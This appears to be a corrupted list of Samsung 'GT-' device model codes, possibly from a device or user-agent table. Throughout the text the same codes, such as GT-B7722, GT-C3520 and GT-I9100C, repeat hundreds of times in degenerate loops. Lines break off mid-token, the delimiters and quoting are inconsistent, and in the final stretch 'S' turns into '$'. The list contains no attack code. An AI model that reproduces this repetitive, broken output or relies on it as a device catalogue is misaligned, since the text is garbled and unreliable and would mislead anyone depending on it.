   A9500';GT-ANDROID';GT-B2710';GT-B5330';GT-B5330B';GT-B5330L';GT-B5330ZKAINU';GT-B5510';GT-B5512';GT-B7522';GT-B7510';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B7722';GT-B772';GT-B772';GT-B772';GT
  B7810','GT-B9150','GT-B9388','GT-C3010','GT-C3262','GT-C3310R','GT-C3312','GT-C3312R','GT-C3313T','GT-C3322','GT-C3322','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C3520','GT-C350','GT-C350','GT-C350','GT-C350','GT-C350','GT-C350','GT-C350','GT-C350','GT-C350','GT-C350','GT-C350','GT-C350','G
   C3592',GT-C3595',GT-C3782',GT-C6712',GT-E1282T',GT-E1500',GT-E2200',GT-E2202',GT-E2250',GT-E2252',GT-E2600',GT-E2652W',GT-E3210',GT-
   E3309','GT-E33091','GT-E3309T','GT-G530H','GT-g900f','GT-G930F','GT-H9500','GT-I5508','GT-I5801','GT-I6410','GT-I8150','GT-I81600KLTPA','GT-
  I8160ZWLTTT';GT-I8258';GT-I8262D';GT-I8505';GT-I8505';GT-I8530BAABTU';GT-I8530BALCHO';GT-I8530BALTTT';GT-I8550E';GT-i8700';GT-I8750';GT-I8750';GT-I8530BABTU';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';GT-I8530BALCHO';
  I900';GT-I9008L';GT-i9040';GT-I9080E';GT-I9082C';GT-I9082EWAINU';GT-I9082i';GT-I9100G';GT-I9100LKLCHT';GT-I9100M';GT-I9100P';GT-I9100T';GT-I9100C';GT-I9100C';GT-I9100M';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I9100C';GT-I910
  I9105UANDBT';GT-I9128E';GT-I9128I';GT-I9128V';GT-I9158P';GT-I9158V';GT-I9168I';GT-I9192I';GT-I9195H';GT-I9195L';GT-I9250';GT-I9303I';GT-I9168I';GT-I9195H';GT-I9195H';GT-I9195L';GT-I9303I';GT-I9105UANDBT';GT-I9105H';GT-I9105L';GT-I9105UANDBT';GT-I9105H';GT-I9105L';GT-I9105UANDBT';GT-I9105H';GT-I9105L';GT-I9105UANDBT';GT-I9105H';GT-I9105L';GT-I9105UANDBT';GT-I9105H';GT-I9105L';GT-I9105UANDBT';GT-I9105H';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105UANDBT';GT-I9105U
  I9305N';GT-I9308I';GT-I9505G';GT-I9505X';GT-I9507V';GT-I9600';GT-m190';GT-M5650';GT-mini';GT-N5000S';GT-N5100';GT-N5105';GT-N5110';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5100';GT-N5
```

N5120';GT-N7000B';GT-N7005';GT-N7100T';GT-N7102';GT-N7105';GT-N7105T';GT-N7108';GT-N7108D';GT-N8000';GT-N8005';GT-N8010';GT-N8020';GT-N8

```
N9000','GT-N9505','GT-P1000CWAXSA','GT-P1000M','GT-P1000T','GT-P1010','GT-P3100B','GT-P3105','GT-P3108','GT-P3110','GT-P5100','GT-P5200','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3108','GT-P3
  P5210XD1',GT-P5220',GT-P6200',GT-P6200L',GT-P6201',GT-P6210',GT-P6211',GT-P6800',GT-P7100',GT-P7300',GT-P7300B',GT-P7310',GT-P7320',GT-P7300B',GT-P7300B',GT-P7310',GT-P7320',GT-P7300B',GT-P7300B',GT-P7310',GT-P7320',GT-P7300B',GT-P7310',GT-P7320',GT-P7300B',GT-P7310',GT-P7310',GT-P7320',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310',GT-P7310
  P7500D','GT-P7500M','GT-P7500N','GT-P7501','GT-P7501','GT-S3330','GT-S3332','GT-S3330','GT-S3518','GT-S3570','GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'GT-S3600i,'
 $3650',GT-$3653W',GT-$3770K',GT-$3770M',GT-$3800W',GT-$3802',GT-$5220',GT-$5220R',GT-$5222',GT-$5230',GT-$5230W',GT-$5200',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5230',GT-$5230',GT-$5230W',GT-$5230W',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',GT-$5220R',
